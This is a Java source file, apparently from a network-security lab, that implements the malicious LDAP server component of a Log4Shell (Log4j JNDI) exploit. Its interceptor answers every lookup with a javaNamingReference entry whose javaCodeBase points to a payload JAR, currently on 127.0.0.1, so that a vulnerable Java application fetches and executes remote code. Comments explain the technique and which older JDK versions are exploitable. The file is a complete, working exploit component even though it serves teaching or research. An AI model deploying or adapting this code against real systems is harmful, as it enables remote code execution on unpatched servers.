package de.seemoo.netsec;

import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;
import com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor;
import com.unboundid.ldap.sdk.Entry;
import com.unboundid.ldap.sdk.LDAPException;
import com.unboundid.ldap.sdk.LDAPResult;
import com.unboundid.ldap.sdk.ResultCode;

public class AttackInterceptor extends InMemoryOperationInterceptor {

    private static final String PAYLOAD_CLASS_NAME = "de.seemoo.netsec.Log4ShellPayload";
    private static final String PAYLOAD_FACTORY_NAME = "de.seemoo.netsec.Log4ShellPayloadFactory";
    private static final String PAYLOAD_CODEBASE = "http://127.0.0.1/payload-1.0-SNAPSHOT.jar";

    @Override
    public void processSearchResult(InMemoryInterceptedSearchResult result) {
        // This method was inspired by:
        // https://github.com/mbechler/marshalsec/blob/master/src/main/java/marshalsec/jndi/LDAPRefServer.java

        // Extracts the domain component from the request (the part after the slash in the LDAP URL)
        String base = result.getRequest().getBaseDN();
        // Creates a new dummy LDAP entry to append our malicious attributes to
        Entry entry = new Entry(base);

        // The schema of storing / retrieving Java objects from LDAP is defined by RFC 2713:
        // https://www.rfc-editor.org/rfc/rfc2713.html

        // By setting the attribute 'objectClass', we're passing a Referencable object from LDAP to the application.
        // This kind of object can be created with a factory class.
        // https://docs.oracle.com/javase/jndi/tutorial/objects/representation/ldap.html
        entry.addAttribute("objectClass", "javaNamingReference");
        // The attribute 'javaClassName' defines the class of the object generated by the factory
        entry.addAttribute("javaClassName", PAYLOAD_CLASS_NAME);
        // The attribute 'javaFactory' defines the factory class which in the end contains the payload
        entry.addAttribute("javaFactory", PAYLOAD_FACTORY_NAME);
        // The attribute 'javaCodeBase' defines the remote location where to look for a JAR file with the
        // class referenced in the previous attributes.
        entry.addAttribute("javaCodeBase", PAYLOAD_CODEBASE);

        // Logs the request with its domain component (the part after the / in LDAP URLs)
        System.out.println("LDAP request for DN " + base);

        // Another approach would be to exploit (de-)serialization of objects which is also supported by LDAP,
        // but for this the system property 'com.sun.jndi.ldap.object.trustURLCodebase' must
        // have been set to 'true' for almost all Java versions.
        // You can read more about it on https://www.innoq.com/en/articles/2022/04/java-jndi/.
        // However, the approach can be used in combination with certain classes of libraries for RCE attacks.
        // Those classes are also called gadgets, read more about it on: https://github.com/mbechler/marshalsec.

        // With the factory approach, it's not required to set the property for Java version <= 8u191.
        // https://news.ycombinator.com/item?id=29505027
        // https://www.lunasec.io/docs/blog/log4j-zero-day/
        // We've confirmed this with JDK & JRE 1.8.0u111 available at
        // https://www.oracle.com/de/java/technologies/javase/javase8-archive-downloads.html
        // We suppose the problem is caused by CVE 2018-3149: https://bugzilla.redhat.com/show_bug.cgi?id=1639834.

        try {
            // Sends the newly generated malicious entry back to the requester
            result.sendSearchEntry(entry);
            // Signals that the LDAP request was successful
            result.setResult(new LDAPResult(0, ResultCode.SUCCESS));
        } catch (LDAPException e) {
            throw new RuntimeException(e);
        }
    }
}
